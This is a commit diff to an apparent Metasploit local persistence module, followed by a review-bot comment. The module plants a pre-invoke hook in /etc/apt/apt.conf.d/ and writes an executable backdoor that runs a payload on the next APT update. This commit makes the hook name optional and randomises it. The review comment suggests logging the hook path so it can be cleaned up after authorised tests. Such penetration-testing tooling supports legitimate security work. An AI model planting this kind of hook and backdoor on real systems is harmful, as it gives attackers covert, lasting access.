Dont require hook name

master
Jacob Robles 2019-04-26 13:11:40 -05:00
parent c643436383
commit 1faa41aafe
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 7 additions and 8 deletions


@ -16,8 +16,8 @@ class MetasploitModule < Msf::Exploit::Local
'Description' => %q( 'Description' => %q(
This module will run a payload when the package manager is used. No This module will run a payload when the package manager is used. No
handler is ran automatically so you must configure an appropriate handler is ran automatically so you must configure an appropriate
exploit/multi/handler to connect. Module creates a pre-invoke hook exploit/multi/handler to connect. This module creates a pre-invoke hook
for APT in apt.conf.d. The Hook name syntax is numeric followed by text. for APT in apt.conf.d. The hook name syntax is numeric followed by text.
), ),
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => ['Aaron Ringo'], 'Author' => ['Aaron Ringo'],
@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Local
], ],
'SessionTypes' => ['shell', 'meterpreter'], 'SessionTypes' => ['shell', 'meterpreter'],
'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' }, 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
'DisclosureDate' => '1999-03-09', # Date Apt package manager was included in Debian 'DisclosureDate' => '1999-03-09', # Date APT package manager was included in Debian
'References' => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'], 'References' => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
'Targets' => [['Automatic', {}]], 'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0 'DefaultTarget' => 0
@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Local
register_options( register_options(
[ [
OptString.new('HOOKNAME', [true, 'Name of hook file to write', '05new-hook']), OptString.new('HOOKNAME', [false, 'Name of hook file to write']),
OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write']) OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])
]) ])
@ -56,9 +56,9 @@ class MetasploitModule < Msf::Exploit::Local
def exploit def exploit
hook_path = '/etc/apt/apt.conf.d/' hook_path = '/etc/apt/apt.conf.d/'
unless writable? hook_path unless writable? hook_path
fail_with Failure::BadConfig, "#{hook_path} not writable, or apt is not on system" fail_with Failure::BadConfig, "#{hook_path} not writable, or APT is not on system"
end end
hook_path << datastore['HOOKNAME'] hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")
backdoor_path = datastore['WritableDir'] backdoor_path = datastore['WritableDir']
unless writable? backdoor_path unless writable? backdoor_path
@ -86,10 +86,9 @@ class MetasploitModule < Msf::Exploit::Local
fail_with Failure::Unknown, "Failed to write #{backdoor_path}" fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
end end
print_status("Backdoor uploaded #{backdoor_path}") print_status("Backdoor uploaded #{backdoor_path}")
print_status('Backdoor will run on next Apt update') print_status('Backdoor will run on next APT update')
# permissions chosen to reflect common perms in /usr/local/bin/ # permissions chosen to reflect common perms in /usr/local/bin/
chmod(backdoor_path, 0755) chmod(backdoor_path, 0755)
end end
end end
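Review bot: With HOOKNAME now optional, the fallback in `exploit` (`hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")`) picks a random file name, and nothing in the visible lines reports the resulting path. After an authorised test the operator would then have no record of which file under /etc/apt/apt.conf.d/ to remove. If the lines outside these hunks do not already print it, add `print_status("Hook written to #{hook_path}")` next to the existing 'Backdoor uploaded' message. The `||` also only covers nil: an option set to an empty string is truthy in Ruby and would leave `hook_path` pointing at the directory itself, so a blank check (`name = datastore['HOOKNAME'].to_s` followed by `name = "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}" if name.empty?`) looks safer. The body of `exploit` between the fourth and fifth hunks is not shown, so both points should be confirmed against the full method.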